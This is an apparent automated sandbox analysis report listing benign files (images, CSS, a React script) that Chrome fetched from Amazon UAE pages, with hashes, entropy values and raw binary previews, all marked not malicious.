                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DAPAVCQJMFK78QJEV1PMZ%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D49221%26at%3D49221%26t%3D1724264968415%26csmtags%3DendVL%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DAPAVCQJMFK78QJEV1PMZ%26aftb%3D1%26lob%3D1:49220
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x309, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):24761
                                                                                                                                                                                                                                                                      Entropy (8bit):7.969036592461493
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:+3QUPOIpomgYZxXd6aFnIStjV7VOIp1jUqE1uwrxA6N9:arO1mvZhd65QjxMW1jUq0u8Bz
                                                                                                                                                                                                                                                                      MD5:42346FC288B0E8C032EF2A7C89F2AAC2
                                                                                                                                                                                                                                                                      SHA1:FB21F894D8421CBCF79D98A1F8088D4362D81E5D
                                                                                                                                                                                                                                                                      SHA-256:43CC3F9BE65995D4F19BE9FC0695BADAAAC4D1C70084F57B3CB585C2FE632782
                                                                                                                                                                                                                                                                      SHA-512:0573D1BEE3DB864B1128A6C85310423BC9E21F01CA0E02D33CD2D0B559AC6E69EE905926A3EEC7AE60C057CDC166DD374D2D20F7FB26014F71E6F76FDE1819F0
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71ApD6of+QL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......5.@.."..........6...................................................................X................jQ?n...g_J..m...h&.....................o....h.a.......I.=..F-..e.U..Ob.>#U..v.o.......'.&.............*.N...e...^.%...].7.f...6;...v...[..+.p..z.f...'.x..6..W....,.....i.............,.{.u.M..A.....9K......u.....aY.l..&#..*..UT{2..6...:B...<..>..w...=...gW..X.........#2..9d...(..9p.$.a..1...6.........M."hs.r....N2.F..^..oB..%.9.l..\y..!..X...C.y..+.........L.T.5.M..:Ub...|.q..%.t%.+.F....D..3.,..Q..MV.Q.;M. i..Q...".V.h..........d`.dhv.v...H..\."9b..:.y..V. ....'2r.F..../.m3Y....+&.3[...^...9.&`...........i5.=...d...YN:>.]...i.m.w*.....Q....}....zr>Q.{N...%..o..X...GhZ&e.>...b.............cY..3.._O....=.[p..[eG.I...72....d{m...].Z.3.....+s..!!..6..z)jn....h.......P.....i...<....6\...ky....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 512 x 256, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):22428
                                                                                                                                                                                                                                                                      Entropy (8bit):7.910842269862625
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:qlbGl6f7R7T7rLr3s96g/W1BapndUdH6Qu3pDm+RaHHhKTOl1uk5xs:Lm7R7r/3pWW6pnudH6Qu5CZhKTA0+i
                                                                                                                                                                                                                                                                      MD5:BE418CBD22D8CD432FD8F3F6AE2ABD76
                                                                                                                                                                                                                                                                      SHA1:8A1EB36BDA141942C27CE5F2586CCB5EE17A2DA3
                                                                                                                                                                                                                                                                      SHA-256:F95648CD95B78DE088904519725C67FFF220F589DC045F19FFBA21550450409F
                                                                                                                                                                                                                                                                      SHA-512:85A442470444250A639C86753F1E9D3DC8C308D9F173C250CFEDACD8A1E16F4E3419DA0C7A6F19695CF6D1C25964B54E4FEE4193EED183B41C9E6043BDB827E8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/sash/ZpbG74laklgnz-i.png
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR..............N>U....PLTEGpL................79.78....... ;.(=..........+m.2I..;..$.qI.4:....%<. ;hjjcdehkkfiifiifhh.....@2?..?T..gjj...H.*l.O..>...O./;.2...ARB..............>N....>............:..D.).......................T..U$..(../.. ..$..$................*..,...........$..#..#..#..#..$..#..#..#........#..$..&............)}.)}.)}.)}.)}.)}.)}.)}.)}.)}.JI..H..K..K...<..vH..H...<...$*/......@@@...)1<......BGL...RUX...mxx.........`..K...<.E...%..C..X.D..w........<....uR.-<>A#/>:?C"$';>A;?C...-8D<?C8>C>@C$..............:>B;@D......&{..p.;...........$........................i......@?._I..W.....Q.G6.G6.G6.H6..-.ul.`.6d...........................................?@A?@A...3>H......V........#...vg.8!."....'..7.....@.....D..%.f%.f....^..]..].;........(......].......g...hV....tRNS.....sy..V..*..!1d..L...;.\v..D.....o.yo.N..o..'\.<{3...5..a..?...X(.......H.7P..h.........w....t....[..B...........................h...............*.`...@.....qQ......1.I..we..\....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):44956
                                                                                                                                                                                                                                                                      Entropy (8bit):7.957307880486643
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:rB9D8khQda97D8ZuTLmuhzWM0BQL9kHh199q+hwaSief6gT8H7FGLSwhMED5/9Lh:rBG2QwDM+LmGzYBW949ZdxORMGewh/DV
                                                                                                                                                                                                                                                                      MD5:B6D760A816C75C3591BFF8D2D612CB41
                                                                                                                                                                                                                                                                      SHA1:EB25FD7908C7321008A812C409D174814BAFE707
                                                                                                                                                                                                                                                                      SHA-256:C2E0DA50F17EC793BD5584359182482D6E37CA7CE4521D423CED6B0350FBCEE2
                                                                                                                                                                                                                                                                      SHA-512:86F463DCFD6F3F515162EA7263C732A1F90895449933D33C5EC9A7EC15027D602B8E922A81E4B0A0CD289285123C7525BB825E713D89FAED66FC8BFCD0B556BC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_outdoors_silver/xcm_banners_mena_440x400_coop_6col_phl-intex_440x400_ae-en.jpg
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................T.............................!.1.."AQ2.a.#Bq.......$Rr..%..68U.....&379FXchxy.......................................H...........................!1.AQ.."aq......2R....3Bb..#.'46v..8TUct...............?..C..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1......N)L`.?...3..#........%G.(Z..(...._....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 126x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):9203
                                                                                                                                                                                                                                                                      Entropy (8bit):7.954863681191278
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:glHFrpt5KUfkxctYHZBMpH9Wda2P7KiVOyJ+:sPt5KUfTi66fDrVOG+
                                                                                                                                                                                                                                                                      MD5:68EB8595D081CF4B7EA0D63ED08EED84
                                                                                                                                                                                                                                                                      SHA1:F47590FC6293EC2EF5B7460545DF64112E76EAFD
                                                                                                                                                                                                                                                                      SHA-256:4134D9EA47F8E53290973E4EEBA321B46EBD627E174D6FCB266D97F7C006D708
                                                                                                                                                                                                                                                                      SHA-512:83F1B9B1C9FBE4D8BAC64037C0D2A30A661D8FC90E2200BD9626C41C1EDFEA35CBD470308B6D2EA29882F79AA3FE9C1BD037558887448CD5BB10F9692C6BBF07
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81-cKwx9+lL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........~.."...............................................................!..1"A..Q#2Raq..Bb..3r..$Cc..5.s.................................................!.1..A"2Qa...q.........B............?..z4h.....:...z..V.f*....>..5....nS.W...UP=m.N(].#......P..=6...K...].........]..M.P.C.b0g~.*W_W.<...}7...&....O...L..OF..<UqU..=.6......Fy......q.<[......f..QF..4..1..*Y.....`.h.....=.d..0....d..8b..l...B.V.....s.Z...9.Vcp...3,;....0...%O...-..Y.........}..+IJ?PP"0_s.}F..4....3.{Q4...F.E._.".pn....,.{E..8.@.2!.uW.........F...m.!..w}..0.3.V..q....W.^9.......vtu........7.#x.J..M.o.C9Q..*Q.<.......nQ.i...nR".O!......o......B.N.v.....S....o....8[H.?...U..N.r..Y.........n....Q.....M.4..zO.=mI4.OZ..... .M... _-s...7..&.j..H....n...$!..rB./.....:.i..t.y.<.;.M....p;..vh.0Yn.\N......0\...._r...>...#..O......&hh..[...L.8/.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4343
                                                                                                                                                                                                                                                                      Entropy (8bit):7.910105969959965
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TmbtbFE66jfm++yVJozJupaz7i4Z/oYeW1q6TgpDF67:qbtbe3VyzJup0i4ZRj1gpDFM
                                                                                                                                                                                                                                                                      MD5:312209B764DFCEBAA32CCEE6EEDD1F29
                                                                                                                                                                                                                                                                      SHA1:73067B74F112A032C91D6978BA1A60034E140029
                                                                                                                                                                                                                                                                      SHA-256:7431B3E875E0F31B91BC167DA88599904C6F040F207560E776AA519AB405AEF1
                                                                                                                                                                                                                                                                      SHA-512:3D3F96EDFF3BE6DAC8C01E8E2E0C0BD73F2F9AB38CF999213CBA1F7B3A29C30FC313403EDD76F6DA52C8569AF4F5BA80B4939D272C97F58930C26C786F80D387
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07ns817nh_379x304_ae-en._SY116_CB623271885_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!.."1AQ2t...#aqs......%Rr......45Td...$6BSb...CU................................................1!A.2..".QR............?.&.7....76.F.%|...3l....Nm.:..o....x.X..i:9|..V....~.@.L..Nmd?...`..]...R.3./......*,....Q.Z.t....*...H.....v....H.).[.XF....u..X..X......W....P.h.....$Y".3......2(M.j....U%...M:Q.6.+.kg...^.J.R.. .n..[i.3.d.tG..%.N.H...$c.....&.S.P.Uf....4..$.5.5X....8(..1.]....5f..Z.{k..jD++za8O.m<*.|.*.j;9Qs.6Y..[Zh.'..U.d...7} .Gx.$r+...8.+.5..L.}.o...*.lY....{.N....|.....|..3...y.......uU/$...;.........f..........[.5........h.sF_|?%..k .......Z.[..S...Q.....2.....{.P.".8..T.)W.+M.M<./Z...I.p...C^.s.j......QSB.Xt.&+.D....r......h].U..z...5of.r.....VVN.}.....B.m..2....]8.l. ..!.S.v$H..dc....w.........T.T.L...M....7Z..k2
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 169x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):10427
                                                                                                                                                                                                                                                                      Entropy (8bit):7.962248716829095
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:3ITcYnu+XzI2xIZr7PdVsYanDK5Ygz7QM6BjxoYysk4aIFaErepSt4ziUxn:3Ixu+XzXx+dV/anD0QMSFoYys3afErQ7
                                                                                                                                                                                                                                                                      MD5:D009DD402EA4CB2EFFFFCD816B0EB8A0
                                                                                                                                                                                                                                                                      SHA1:038C58EDA65E6D88931B87BE9A0F67FDDA64E32D
                                                                                                                                                                                                                                                                      SHA-256:17F82AF309321290CE8DBB5A26D874C4929AE4E3E71396A96FFE57798BB15A55
                                                                                                                                                                                                                                                                      SHA-512:138C5F8FB713D26BB38794534036095805C96BD436511CAC41DB06F678EBAED5F51D754B599D482067A21E3599767E9894633D94C66311C71528021AF3B6A4F1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61931GDnYxL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1.AQa"q....2BR....#3Cbr....4st...5Sd..%c....$U.....................................................!1..aq"2A..$3...BQr.............?..x.....].,.............(..^...U.U.9s.....K.....b.En..V>;.0...4n..$..C..f..0..7Bl...I.....b=v_..]...W...'.....k".....c.79....L...1.JM....0..........].#..>..p..z.......!..=.......M$H.zI.......uZ=...O.8...?.1...I.~V.......V.x....9.yg...{......._..@..k].[...7....;.\.w..V.....?58....C.....].w.j...........J.].J..[p./..O....g>.WQ.=-$j .......pz.vqni.z[.....eN.......b..*..'..kt,...Z.....=z......_.......n..E.<l4.[...._o?,ln.........S..-g.~OOHB...2...{I.>.....&.....q.38..O......xh_..E...~.4hQH..nK.7..o.7.;......N<...-.k.Z..r..+..\...[..,r.M/s....w........g...5...............B.]L.*;..jo%..Z.C1Rl...N.U<.yZ...N98
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65455)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):137291
                                                                                                                                                                                                                                                                      Entropy (8bit):5.2660240785205366
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:Vi2MVvXHlaAUQ2qNpPMWgxpi4iHenkP3+vja0Vy1YZ:VNtkpSNiHeBr
                                                                                                                                                                                                                                                                      MD5:F7BCB00D4DF41C9C13C7F5283922D26A
                                                                                                                                                                                                                                                                      SHA1:2C7474894226792272947AE47D8198795787CAFE
                                                                                                                                                                                                                                                                      SHA-256:9D161E7989301FC5D63EBE074E0C527BA33CF146AD003BF9D6F3BB1AD30D9518
                                                                                                                                                                                                                                                                      SHA-512:DE504F3E26EE3E6F270D038585207C96BA9BCCFC9B12491199B35C4148D888CBD958B6E64606E75E056F165FE4690EB56C37108DD72B92091BAA5D57EEC597B3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71Q5hfLlYnL.js
                                                                                                                                                                                                                                                                      Preview:/*! For license information please see react-dom.profiling.min.js.LICENSE.txt */.!function(){"use strict";var e,n;e=this,n=function(e,n){function t(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}function r(e,n){l(e,n),l(e+"Capture",n)}function l(e,n){for(Ea[e]=n,e=0;e<n.length;e++)Sa.add(n[e])}function a(e,n,t,r,l,a,o){this.acceptsBooleans=2===n||3===n||4===n,this.attributeName=r,this.attributeNamespace=l,this.mustUseProperty=t,this.propertyName=e,this.type=n,this.sanitizeURL=a,this.removeEmptyString=o}function o(e,n,t,r){var l=_a.hasOwnProperty(n)?_a[n]:null;(null!==l?0!==l.type:r||!(2<n.length)||"o"!==n[0]&&"O"!==n[0]||"n"!==n[1]&&"N"!==n[1])&&(function(e,n,t,r){if(null==n||function(e,n,t,r){if(null!==t&&0===t.type)return!1;switch
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):42629
                                                                                                                                                                                                                                                                      Entropy (8bit):7.953691836651141
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:vDzKvda/KAlIUbsGQodVr6tF8LAXlaJ/LPF5iCJWOe7oUOtjrPTIewvBDa3:T/BBBSuG6nBJ7Uise6Va3
                                                                                                                                                                                                                                                                      MD5:9ED3802BE9B66CC15144D53830C93A7A
                                                                                                                                                                                                                                                                      SHA1:00DCD573B50B3CF6CB6B85ABFBEEB15E7252EEF0
                                                                                                                                                                                                                                                                      SHA-256:87619BFC60D16B2F1E1202744CF749736EAE499E52B09DE6A2C1F704FF738CD5
                                                                                                                                                                                                                                                                      SHA-512:04AE3CBC2BC9EFB0A110C7689C7EC84C6A2F4CA8CE5C64F20C96B3DC79BD086037F4AA77FF4227002851E25EFE45D17B53375752CB25918CADEAC5E7A6B1D72F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d..............................................................................................................!1..AQ."a..#2Vq.....BR....$38br...Sstv............&6CTcu.....%'4DUd.57F................................!1AQ"aq...2R.......BSr....#34b.....$5Cs..%T.c..............?.......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...?........P..@(......P..@(...>....@Y..yv.I."...-.>........e....k..h.?...2k...r..3.ex..D..^.c;.m]...".......f:Yh..}m.....'....C.....y.Q.\L....}.v..-EH.i.....^~v.e..5l8.....v.....a.S...z..-;.m..H......Q...>r.?5{.|.e..R^...3a..e...W....{.o.....n.c.1....9Tw...K.h..a..o.............@....mW.e....?.\Z;..;.."7..~..*W.+|...U/..P....S.D=........{bo|r.......M...k..z...n..d..r.g..5.e.n..l..vk,..R.r.Y.{.....kx+...Qzb...4.N..e%........e(.......9.w?3n4.?.^.'.<....n........=k........JQ6l.3.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):71
                                                                                                                                                                                                                                                                      Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                      MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                      SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                      SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                      SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):16498
                                                                                                                                                                                                                                                                      Entropy (8bit):7.893844773261115
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:V+Usd2M0reizvzbKhf8pE/fFWVkshY6TlNP:VY2M0TrK6pE/fUhY6BNP
                                                                                                                                                                                                                                                                      MD5:8EE1E539BF47093B2010B33A9954FEFB
                                                                                                                                                                                                                                                                      SHA1:260E692F66B4CA85F388656D671F9D64AF4EE88A
                                                                                                                                                                                                                                                                      SHA-256:E5A08455E83C89091AAA6979E721A59DBCFABC9111AF513620CD077B435E3DBC
                                                                                                                                                                                                                                                                      SHA-512:774471E773EAD800DA2DFB5F656A6F797B05783124F08E652F7F4580BB8FF29DFD882133660B5E25E062C9AA308C3D9FF1878266D7ED243430C3D153E01520E2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................`.................................................................................................................................................................?5.N.z.....^.<.....(.I%...C.W8.....V8....~.....W.P.x.q..........C..oL>i\......;2o}.......>=T....e................M..u...o..'./.q,.S.....m......Yb3..F}...:z....et.+..+U.....Fi\pYiC...r..-.d...Z....(.j.{..m...1.....c..h.E........x........Rj.f+E.~8>.i..m...5.wb:.Y...v.....5...[T%.{......w..*.o..Lx.>Z\F........f.r.R.jq..G.......9..Kf.{..B.*...nh............K.O...t...dg..G..}...j....*.t.;..p.....q...6N.s.......|...Z.."y.h....~.../.[........(..B)...7.!=...9..m.2..A.q.i......`........&..f...5d....}...v...l..F..c.z.6~.....w9:..J.YG.....Y.....U..q....m...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x300, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):15160
                                                                                                                                                                                                                                                                      Entropy (8bit):7.903306674101077
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:1eGpQ0Lr0Nm75qFfBJGuvljX2m5GvPO0ObgU:1l1LgQqfJGuv12lqbgU
                                                                                                                                                                                                                                                                      MD5:BF91DF9055007AA7C224F69067958108
                                                                                                                                                                                                                                                                      SHA1:70124F446C68FAA3F7B2DA9B3820C1A5D6528198
                                                                                                                                                                                                                                                                      SHA-256:17BB4AD1932CD873241487109BB2359F9B80577DBCCCD5DC82C1A75B8B594B0A
                                                                                                                                                                                                                                                                      SHA-512:5085B3199452ACAD594F68545A36712A5E0D13AD6A152414EC735C3ED178081A3C23507D37A1793E5F6F72B7F94C58054783440F4741FD92FC52FF9498498FAD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,...."...........................................................................................&.0............k9....<\.[]...........9m...i.\..k.c.v. .........rJ...U..>.>y..+.(.............Y...M......=..~.:p........<....@..<m.w.3I.6G./%.............b.................././F-kj.|..n.................wa.ro...................r:........._.6.?.s.]..5NS..`.............I......H..M.=r..Q..........Ui.5.w.`...s_.....$..(........^.q..C....Y.............!U.ix..............@....y[.4X.b.......;....<.e. .....g.....T.g_a.U]..........(..I.@..(.!.......,#nZGE...cM.7-.i........`.....................V.......3........F.`.........~{..(..............b.....[S.N..~............/.G.a....M.-tL.>............O........`......7.w..3...........5....[...L.....6YV..v6r..........o.....MC.2.......q.....p|e.*.`......... .Z......f.,.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1231)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):2564
                                                                                                                                                                                                                                                                      Entropy (8bit):5.09985561571782
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:/O3OpHOp8OrOhO189J9k9i9k9K9Ef9k9K9pGK18lupnGpwpCpvpSpiULvApSprpA:I9R8MW
                                                                                                                                                                                                                                                                      MD5:3A5AF46222E6D0C3A85B855747A20665
                                                                                                                                                                                                                                                                      SHA1:32355D51B16A8BB09A71FE422F18C86173D663C2
                                                                                                                                                                                                                                                                      SHA-256:9214297B27EFD46EFC4669053F0154828B44F1666028FE22DF10F63E9EB9D545
                                                                                                                                                                                                                                                                      SHA-512:13DDABBC4658C246DC2D86C0967DCB9A71B8DF6AF3A527E878F22583AF25DAB99C277372AA638B16DC55E46D07F34570EA800E08D57B28DA19F1652563AC8B2E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/I/113mXmMm69L.css?xcp
                                                                                                                                                                                                                                                                      Preview:._cropped-image-link_style_cropped-image-link__3winf{height:600px}@media (max-width:767px){._cropped-image-link_style_cropped-image-link__3winf._cropped-image-link_style_tablet-app__1Ez8O{height:368px}}@media (min-width:768px) and (max-width:919px){._cropped-image-link_style_cropped-image-link__3winf._cropped-image-link_style_tablet-app__1Ez8O{height:470px}}[data-grid-size="3"] ._cropped-image-link_style_cropped-image-link__3winf,[data-grid-size="4"] ._cropped-image-link_style_cropped-image-link__3winf{height:615.6px}[data-grid-size="5"] ._cropped-image-link_style_cropped-image-link__3winf{height:748px}.._cropped-image-link_style_centerImage__1rzYI{height:100%;width:100%}.._cropped-image-link_style_fluidImageContainer__2jd50{height:100%;overflow:hidden;position:relative;width:100%}._cropped-image-link_style_fluidImageContainer__2jd50 ._cropped-image-link_style_fluidImage__iJ3aE{margin:auto;position:absolute}._cropped-image-link_style_fluidImageContainer__2jd50 ._cropped-image-link_styl
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 169x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10632
                                                                                                                                                                                                                                                                      Entropy (8bit):7.961860501474742
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:x3A9++vQQlh/cLkCyqNORb9ez62dK6iNYq7RZ6yPl3+bxPJz6xB/mYG+/S2FQ1FV:KvQQLp1Ez7U60nb6il3sPoxB/zS2EJj
                                                                                                                                                                                                                                                                      MD5:F9996ABFCFEAE3EB5326DEA1731C3EF1
                                                                                                                                                                                                                                                                      SHA1:8EBF32DE68A5AA28CB7E210E76AB31B6B5C23C59
                                                                                                                                                                                                                                                                      SHA-256:80668D4A9771C5044686D2F810599A9FF0384E6C829B9BAF42A3529B406F8AA3
                                                                                                                                                                                                                                                                      SHA-512:46287019A8C3AF778EE4ABF71128189CA0D84A0DD03B2E41FC1B8852437A89F7FB2B0A44A4495673A3CA0AA66A341440BB1D8DA7BE1AC9499F57521206770F6C
                                                                                                                                                                                                                                                                      Malicious:false
